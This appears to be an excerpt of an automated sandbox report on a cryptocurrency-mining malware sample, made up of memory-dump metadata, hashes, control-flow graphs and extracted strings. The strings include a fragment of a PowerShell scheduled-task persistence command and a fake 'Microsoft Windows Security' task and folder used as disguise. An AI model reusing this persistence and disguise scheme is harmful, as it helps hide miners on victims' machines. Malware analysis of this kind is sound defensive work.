                                                                                                                    • Source File: 00000011.00000002.2161609594.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9bba0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1f05a88eb14c16c69685b64467156ee6a4bf5738f32787bc0f8b6f55dae73dfb
                                                                                                                    • Instruction ID: 6c640bbf51a670db414335b007aba35dd7ec1409966f4a5a225c64abf8f30cda
                                                                                                                    • Opcode Fuzzy Hash: 1f05a88eb14c16c69685b64467156ee6a4bf5738f32787bc0f8b6f55dae73dfb
                                                                                                                    • Instruction Fuzzy Hash: D9F0BE32B0E5498FD768EA4CE4518A873E0FF45324B1100BAE16DC70F3CA25EC40CB45
                                                                                                                    Function 00007FFD9BBA53E4 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2161609594.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9bba0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c1ea4887ee526584016a4c0a68f3b03f9884d77d2bd558a7a8d6fb10e85c7d48
                                                                                                                    • Instruction ID: 79e80f509c503997305415167631575cce0e7771d3d4148788e580149657b2ee
                                                                                                                    • Opcode Fuzzy Hash: c1ea4887ee526584016a4c0a68f3b03f9884d77d2bd558a7a8d6fb10e85c7d48
                                                                                                                    • Instruction Fuzzy Hash: 4AF0A73131CF044FD744EE1DD4457A1B3D0FBA8314F10452FE449C3251DA21E4818782
                                                                                                                    Function 00007FFD9BBA4CD0 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2161609594.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9bba0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 42854243c57196f1ec7ce012c9c9e592de9cf3085aa588c73623c588bdb31838
                                                                                                                    • Instruction ID: 17cd5254800b9bb5aee8e259909234ec32fe6d1cd5ad999741de7880b5d560b4
                                                                                                                    • Opcode Fuzzy Hash: 42854243c57196f1ec7ce012c9c9e592de9cf3085aa588c73623c588bdb31838
                                                                                                                    • Instruction Fuzzy Hash: 99F05E32A0E5498FE768EA5CE4528A877E0FF4532471500BAE15EC74A3DA26AC50C744

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF7A2DD14B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2592197526.00007FF7A2DD1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A2DD0000, based on PE: true
                                                                                                                    • Associated: 00000015.00000002.2592180628.00007FF7A2DD0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.2592521219.00007FF7A3359000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.2592540109.00007FF7A3362000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.2592555744.00007FF7A3365000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.2592574991.00007FF7A3366000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7ff7a2dd0000_winupsecvmgr.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                    • Instruction ID: 6da5b404cd873d556be35617dadaffbb3e9b8f422885a76a354a342df7aa8380
                                                                                                                    • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                    • Instruction Fuzzy Hash: 0AB0123090FA0AACE3003F61D8412587620BF04740FC24035C40C13373CEBD9040C730

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF693C685C0 Relevance: 55.0, APIs: 15, Strings: 21, Instructions: 1045COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 7ff693c685c0-7ff693c686b0 call 7ff693c5e3d0 call 7ff693c5d340 5 7ff693c686d6-7ff693c686e5 0->5 6 7ff693c686b2-7ff693c686d1 call 7ff693c514f0 0->6 8 7ff693c686eb-7ff693c68761 wcslen 5->8 9 7ff693c69d21-7ff693c69dc7 5->9 6->5 10 7ff693c6878c-7ff693c68793 8->10 11 7ff693c68763-7ff693c68787 call 7ff693c514f0 8->11 13 7ff693c6881b-7ff693c688db call 7ff693c540a8 call 7ff693c53360 call 7ff693c53c50 memset 10->13 14 7ff693c68799-7ff693c68813 10->14 11->10 21 7ff693c6890d-7ff693c6891c 13->21 22 7ff693c688dd-7ff693c68908 call 7ff693c514f0 13->22 14->13 24 7ff693c6895e-7ff693c6898b 21->24 25 7ff693c6891e-7ff693c68956 21->25 22->21 26 7ff693c6898d-7ff693c689b1 call 7ff693c514f0 24->26 27 7ff693c689b6-7ff693c689bd 24->27 25->24 26->27 29 7ff693c689fe-7ff693c68a59 call 7ff693c52b30 call 7ff693c52b00 memset 27->29 30 7ff693c689bf-7ff693c689f6 27->30 35 7ff693c68a8b-7ff693c68a92 29->35 36 7ff693c68a5b-7ff693c68a86 call 7ff693c514f0 29->36 30->29 38 7ff693c68acd-7ff693c68b6e call 7ff693c52b00 memset 35->38 39 7ff693c68a94-7ff693c68ac6 35->39 36->35 42 7ff693c68ba0-7ff693c68ba7 38->42 43 7ff693c68b70-7ff693c68b9b call 7ff693c514f0 38->43 39->38 45 7ff693c68bad-7ff693c68c67 42->45 46 7ff693c68c6f-7ff693c68d17 call 7ff693c52b00 memset 42->46 43->42 45->46 49 7ff693c68d49-7ff693c68d61 46->49 50 7ff693c68d19-7ff693c68d44 call 7ff693c514f0 46->50 52 7ff693c68d67-7ff693c68e16 49->52 53 7ff693c68e1e-7ff693c68e5a 49->53 50->49 52->53 54 7ff693c68e5c-7ff693c68e80 call 7ff693c514f0 53->54 55 7ff693c68e85-7ff693c68e8c 53->55 54->55 57 7ff693c68edc-7ff693c68f46 call 7ff693c52b30 call 7ff693c52b00 memset 55->57 58 7ff693c68e8e-7ff693c68ed4 55->58 63 7ff693c68f78-7ff693c68f87 57->63 64 7ff693c68f48-7ff693c68f73 call 7ff693c514f0 57->64 58->57 66 7ff693c68fe9-7ff693c69016 63->66 67 7ff693c68f89-7ff693c68fe1 63->67 64->63 68 7ff693c69018-7ff693c6903c call 7ff693c514f0 66->68 69 7ff693c69041-7ff693c69048 66->69 67->66 68->69 71 7ff693c6904a-7ff693c69078 69->71 72 7ff693c6907f-7ff693c690e2 call 7ff693c52b30 call 7ff693c52b00 memset 69->72 71->72 77 7ff693c69114-7ff693c6911b 72->77 78 7ff693c690e4-7ff693c6910f call 7ff693c514f0 72->78 79 7ff693c6911d-7ff693c6914f 77->79 80 7ff693c69156-7ff693c691bf call 7ff693c52b00 memset 77->80 78->77 79->80 84 7ff693c691f1-7ff693c691f8 80->84 85 7ff693c691c1-7ff693c691ec call 7ff693c514f0 80->85 87 7ff693c691fa-7ff693c69256 84->87 88 7ff693c6925e-7ff693c69283 call 7ff693c52b00 call 7ff693c51ea0 84->88 85->84 87->88 93 7ff693c69285-7ff693c692ab call 7ff693c514f0 88->93 94 7ff693c692b0-7ff693c692b7 88->94 93->94 95 7ff693c692b9-7ff693c692d8 94->95 96 7ff693c692e0-7ff693c69348 94->96 95->96 98 7ff693c6934a-7ff693c6936e call 7ff693c514f0 96->98 99 7ff693c69373-7ff693c6937a 96->99 98->99 101 7ff693c69422-7ff693c694b1 call 7ff693c53010 99->101 102 7ff693c69380-7ff693c6941a 99->102 105 7ff693c694b8-7ff693c694ce call 7ff693c54051 101->105 102->101 108 7ff693c694d0-7ff693c694ea call 7ff693c514f0 105->108 109 7ff693c694ef-7ff693c694f6 105->109 108->109 110 7ff693c694f8-7ff693c6950b 109->110 111 7ff693c6950f-7ff693c6951c _wcsicmp 109->111 110->111 113 7ff693c69522-7ff693c69528 111->113 114 7ff693c69810-7ff693c69813 call 7ff693c52a50 111->114 113->114 115 7ff693c6952e-7ff693c69533 call 7ff693c53310 113->115 118 7ff693c69818-7ff693c6981b 114->118 119 7ff693c69538-7ff693c69544 115->119 121 7ff693c69823-7ff693c69844 memcpy 118->121 120 7ff693c6954a-7ff693c6954c 119->120 119->121 122 7ff693c69557-7ff693c6957b memcpy 120->122 123 7ff693c6954e-7ff693c69551 120->123 124 7ff693c69846-7ff693c69872 memcpy call 7ff693c514f0 121->124 125 7ff693c69877-7ff693c6987e 121->125 128 7ff693c6957d-7ff693c695a3 memcpy call 7ff693c514f0 122->128 129 7ff693c695a8-7ff693c695af 122->129 123->105 123->122 124->125 126 7ff693c69a08-7ff693c69a19 call 7ff693c534f0 125->126 127 7ff693c69884-7ff693c69a00 125->127 137 7ff693c69a1b-7ff693c69a1d 126->137 138 7ff693c69a23-7ff693c69a47 memcpy 126->138 127->126 128->129 133 7ff693c69727-7ff693c6975c call 7ff693c52990 129->133 134 7ff693c695b5-7ff693c69720 129->134 140 7ff693c69d02-7ff693c69d1c call 7ff693c531c0 133->140 141 7ff693c69762-7ff693c6976c 133->141 134->133 137->105 137->138 142 7ff693c69a78-7ff693c69a7f 138->142 143 7ff693c69a49-7ff693c69a73 memcpy call 7ff693c514f0 138->143 140->9 144 7ff693c697a3-7ff693c697aa 141->144 145 7ff693c6976e-7ff693c6979e call 7ff693c514f0 141->145 147 7ff693c69ae7-7ff693c69b1e call 7ff693c52990 142->147 148 7ff693c69a81-7ff693c69a88 142->148 143->142 151 7ff693c697ac-7ff693c697e1 144->151 152 7ff693c697e8-7ff693c69808 call 7ff693c52990 144->152 145->144 160 7ff693c69b24-7ff693c69b8b 147->160 161 7ff693c69ce3-7ff693c69cfd call 7ff693c531c0 147->161 153 7ff693c69a90-7ff693c69ab0 148->153 151->152 152->105 153->153 157 7ff693c69ab2-7ff693c69adf 153->157 157->147 162 7ff693c69c25-7ff693c69c2c 160->162 163 7ff693c69b91-7ff693c69c20 call 7ff693c514f0 160->163 161->140 166 7ff693c69cc2-7ff693c69cd9 call 7ff693c52990 162->166 167 7ff693c69c32-7ff693c69cbb 162->167 163->162 170 7ff693c69cde 166->170 167->166 170->105
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$memcpy$_wcsicmpwcslen
                                                                                                                    • String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$5RK\E$APPDATA=$SYSTEMROOT=$USERPROFILE=$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\vljmdnomkxppwbqz$\Google\Libs\$\Microsoft Windows Security\winupsecvmgr.exe$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft Windows Security$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$e; }$eth$xmr
                                                                                                                    • API String ID: 1321921031-4262344814
                                                                                                                    • Opcode ID: d9f3d5bc41745b18332aeaa6172c5c920e87bb39262a86d46d0c8377e5a0108f
                                                                                                                    • Instruction ID: 0fc3a87640292246dfb672987875f16dd0e552ff17044c23ca02190be453082c
                                                                                                                    • Opcode Fuzzy Hash: d9f3d5bc41745b18332aeaa6172c5c920e87bb39262a86d46d0c8377e5a0108f
                                                                                                                    • Instruction Fuzzy Hash: CED26C6581CEC3D5F7325B29A4032F573B8FF91384F0452B2DD8DA26A2DF2EA2458345
                                                                                                                    Function 00007FF693C51180 Relevance: 12.2, APIs: 8, Instructions: 195sleepstringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 225 7ff693c51180-7ff693c511ae 226 7ff693c511b4-7ff693c511d1 225->226 227 7ff693c51450-7ff693c51453 GetStartupInfoA 225->227 228 7ff693c511e4-7ff693c511ef 226->228 229 7ff693c51460-7ff693c5147a call 7ff693c665f0 227->229 230 7ff693c511d3-7ff693c511d6 228->230 231 7ff693c511f1-7ff693c511ff 228->231 233 7ff693c511dc-7ff693c511e1 Sleep 230->233 234 7ff693c513f0-7ff693c51401 230->234 235 7ff693c51407-7ff693c51416 call 7ff693c665e8 231->235 236 7ff693c51205-7ff693c51209 231->236 233->228 234->235 234->236 241 7ff693c5141c-7ff693c51437 _initterm 235->241 242 7ff693c51224-7ff693c51226 235->242 237 7ff693c5120f-7ff693c5121e 236->237 238 7ff693c51480-7ff693c51499 call 7ff693c66600 236->238 237->241 237->242 251 7ff693c5149e-7ff693c514a6 call 7ff693c66630 238->251 245 7ff693c5122c-7ff693c51239 241->245 246 7ff693c5143d-7ff693c51442 241->246 242->245 242->246 248 7ff693c5123b-7ff693c51243 245->248 249 7ff693c51247-7ff693c5128f call 7ff693c5d7b0 SetUnhandledExceptionFilter call 7ff693c66070 call 7ff693c5d530 call 7ff693c66050 245->249 246->245 248->249 261 7ff693c512a5-7ff693c512ab 249->261 262 7ff693c51291 249->262 263 7ff693c512ad-7ff693c512bb 261->263 264 7ff693c51293-7ff693c51295 261->264 265 7ff693c512e7-7ff693c512ed 262->265 268 7ff693c512a1 263->268 266 7ff693c51297-7ff693c5129a 264->266 267 7ff693c512c0-7ff693c512c2 264->267 269 7ff693c512f3-7ff693c51318 malloc 265->269 270 7ff693c513d0-7ff693c513da 265->270 266->267 271 7ff693c5129c 266->271 272 7ff693c512c4 267->272 273 7ff693c512d5-7ff693c512de 267->273 268->261 276 7ff693c5131a-7ff693c51320 269->276 277 7ff693c5135c-7ff693c51390 call 7ff693c5d340 call 7ff693c685c0 269->277 274 7ff693c513dc 270->274 275 7ff693c513e1-7ff693c513e7 270->275 271->268 279 7ff693c512e0 272->279 273->279 280 7ff693c512d0-7ff693c512d3 273->280 274->275 275->269 281 7ff693c51325-7ff693c51355 strlen malloc memcpy 276->281 286 7ff693c51395-7ff693c513a3 277->286 279->265 280->273 280->279 283 7ff693c51357 281->283 284 7ff693c51322 281->284 283->277 284->281 286->251 287 7ff693c513a9-7ff693c513b1 286->287 287->229 288 7ff693c513b7-7ff693c513c6 287->288
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 649803965-0
                                                                                                                    • Opcode ID: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
                                                                                                                    • Instruction ID: 65eea0b182acf57c2f75f8ad9e0f3a4f8c725bed2b281779911fbb70bf4b8f40
                                                                                                                    • Opcode Fuzzy Hash: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
                                                                                                                    • Instruction Fuzzy Hash: F6813335A1DE06C6EA709F15A85677933B9EF44B88F8440B5DE4EE7391DE2DF8408340
                                                                                                                    Function 00007FF693C51720 Relevance: 31.8, APIs: 10, Strings: 8, Instructions: 341COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 171 7ff693c51720-7ff693c51796 172 7ff693c517d5-7ff693c517e7 call 7ff693c540c6 171->172 175 7ff693c517e9-7ff693c517eb 172->175 176 7ff693c517a0-7ff693c517cd call 7ff693c5402d 172->176 178 7ff693c51e30-7ff693c51e3d 175->178 179 7ff693c517f1-7ff693c51824 175->179 176->172 184 7ff693c51e50-7ff693c51e70 wcslen 178->184 181 7ff693c51850-7ff693c5185e 179->181 182 7ff693c51830-7ff693c51835 181->182 183 7ff693c51860-7ff693c51867 181->183 187 7ff693c5183b-7ff693c5184a 182->187 188 7ff693c51990-7ff693c519b1 call 7ff693c54045 182->188 185 7ff693c518a6-7ff693c518ad 183->185 186 7ff693c51869-7ff693c518a1 call 7ff693c514f0 183->186 192 7ff693c51e80 184->192 190 7ff693c5190c-7ff693c51924 wcsncmp 185->190 191 7ff693c518af-7ff693c51904 185->191 186->185 187->181 187->188 188->192 197 7ff693c519b7-7ff693c51a1a call 7ff693c54075 call 7ff693c53c50 memset 188->197 190->182 194 7ff693c5192a-7ff693c51988 call 7ff693c5405d 190->194 191->190 194->182 201 7ff693c5198e 194->201 204 7ff693c51a1c-7ff693c51a4c call 7ff693c514f0 197->204 205 7ff693c51a51-7ff693c51a58 197->205 201->188 204->205 207 7ff693c51a5a-7ff693c51a97 205->207 208 7ff693c51a9f-7ff693c51acc wcscpy wcscat wcslen 205->208 207->208 209 7ff693c51e08-7ff693c51e1a 208->209 210 7ff693c51ad2-7ff693c51af0 wcslen 208->210 211 7ff693c51af6-7ff693c51b02 wcslen 209->211 212 7ff693c51e20-7ff693c51e2b 209->212 210->211 210->212 213 7ff693c51b07-7ff693c51b28 211->213 212->213 213->184 214 7ff693c51b2e-7ff693c51e00 wcslen * 2 call 7ff693c5402d * 2 call 7ff693c54069 call 7ff693c54045 * 2 213->214
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcsncmp
                                                                                                                    • String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$X$\??\$`$explorer.exe$xmr
                                                                                                                    • API String ID: 1181335886-2264807111
                                                                                                                    • Opcode ID: 788d4c9155a91c8ad4268d33b642df41f1b2bb432a15ca7e3ae6377dbdcd54b0
                                                                                                                    • Instruction ID: fde70e07be69935a0eafc99ce50191732b8234cb502b09fc5bbb4deb33185c2c
                                                                                                                    • Opcode Fuzzy Hash: 788d4c9155a91c8ad4268d33b642df41f1b2bb432a15ca7e3ae6377dbdcd54b0
                                                                                                                    • Instruction Fuzzy Hash: 46028C2291CBC2C5E7318B25E8063AA77B8FB95798F004375DAADA36D5DF3DE1848740
                                                                                                                    Function 00007FF693C52990 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcsncmp
                                                                                                                    • String ID: \BaseNamedObjects\vljmdnomkxppwbqz$eth
                                                                                                                    • API String ID: 1181335886-3208800472
                                                                                                                    • Opcode ID: c0395dea537243c4d0dd7cc2981c96954146abf1c3cf7e98ea4515befdec0913
                                                                                                                    • Instruction ID: ada0cc5287161d49285523ab3027a75546e4262d8df29971af3eacf7a75ee6e5
                                                                                                                    • Opcode Fuzzy Hash: c0395dea537243c4d0dd7cc2981c96954146abf1c3cf7e98ea4515befdec0913
                                                                                                                    • Instruction Fuzzy Hash: 0001E522A0CA41D1E2309A26A8017EA6675EFC5BD0F544275FE8DA3B95CE7CD1468704
                                                                                                                    Function 00007FF693C52A50 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcslen
                                                                                                                    • String ID: 0$eth
                                                                                                                    • API String ID: 4088430540-242559905
                                                                                                                    • Opcode ID: 0158d5ed002690e09dbffb5b0abf68a40d101fd7cbfc6956e22a144c59ec97ef
                                                                                                                    • Instruction ID: c9dd44ccd2eea7e33e12e817129be473ca5f230fd1843c8b94cb0910112f51c8
                                                                                                                    • Opcode Fuzzy Hash: 0158d5ed002690e09dbffb5b0abf68a40d101fd7cbfc6956e22a144c59ec97ef
                                                                                                                    • Instruction Fuzzy Hash: 7501D62261CA80C1E7219B50F85179BB774EFC4368F640325FA9C96AD5DF3EC5858740

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF693C51EA0 Relevance: 37.2, APIs: 9, Strings: 12, Instructions: 475COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 352 7ff693c51ea0-7ff693c51f16 call 7ff693c66680 355 7ff693c51f18-7ff693c51f3e memcpy call 7ff693c514f0 352->355 356 7ff693c51f43-7ff693c51f4a 352->356 355->356 358 7ff693c5208d-7ff693c520bb wcslen memcpy 356->358 359 7ff693c51f50-7ff693c52086 356->359 360 7ff693c520bd-7ff693c520e3 memcpy call 7ff693c514f0 358->360 361 7ff693c520e8-7ff693c520ef 358->361 359->358 360->361 363 7ff693c52232-7ff693c52278 361->363 364 7ff693c520f5-7ff693c5222b 361->364 365 7ff693c5227a-7ff693c522ca call 7ff693c514f0 363->365 366 7ff693c522cf-7ff693c522d6 363->366 364->363 365->366 368 7ff693c5233c-7ff693c52375 wcslen 366->368 369 7ff693c522d8-7ff693c52334 366->369 370 7ff693c523ca-7ff693c523d1 368->370 371 7ff693c52377-7ff693c523c5 call 7ff693c514f0 368->371 369->368 373 7ff693c52437-7ff693c524a3 call 7ff693c540ed 370->373 374 7ff693c523d3-7ff693c5242f 370->374 371->370 377 7ff693c52929 373->377 378 7ff693c524a9-7ff693c524ea 373->378 374->373 379 7ff693c5292b-7ff693c52969 377->379 380 7ff693c524f3-7ff693c52517 call 7ff693c540f9 378->380 383 7ff693c5251d-7ff693c52589 call 7ff693c540ed 380->383 384 7ff693c5291f-7ff693c52924 call 7ff693c53fdf 380->384 388 7ff693c5258f-7ff693c525b6 call 7ff693c54114 383->388 389 7ff693c524f0 383->389 384->377 392 7ff693c525bc-7ff693c525ce 388->392 393 7ff693c52910-7ff693c5291a call 7ff693c53fdf 388->393 389->380 394 7ff693c52610-7ff693c52617 392->394 395 7ff693c525d0-7ff693c5260b call 7ff693c514f0 392->395 393->389 398 7ff693c52686-7ff693c5269d _wcsnicmp 394->398 399 7ff693c52619-7ff693c5267e 394->399 395->394 401 7ff693c5296a-7ff693c52983 call 7ff693c53fdf * 2 398->401 402 7ff693c526a3-7ff693c526aa 398->402 399->398 401->379 404 7ff693c526ac-7ff693c526cf call 7ff693c514f0 402->404 405 7ff693c526d4-7ff693c526db 402->405 404->405 408 7ff693c5270c-7ff693c52723 _wcsnicmp 405->408 409 7ff693c526dd-7ff693c52704 405->409 408->401 411 7ff693c52729-7ff693c52730 408->411 409->408 412 7ff693c5275a-7ff693c52761 411->412 413 7ff693c52732-7ff693c52755 call 7ff693c514f0 411->413 416 7ff693c52792-7ff693c527a9 _wcsnicmp 412->416 417 7ff693c52763-7ff693c5278a 412->417 413->412 416->401 418 7ff693c527af-7ff693c527e4 416->418 417->416 419 7ff693c527e6-7ff693c5284f call 7ff693c514f0 418->419 420 7ff693c52854-7ff693c5285b 418->420 419->420 422 7ff693c528fc-7ff693c5290e wcsstr 420->422 423 7ff693c52861-7ff693c528f4 420->423 422->393 422->401 423->422
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
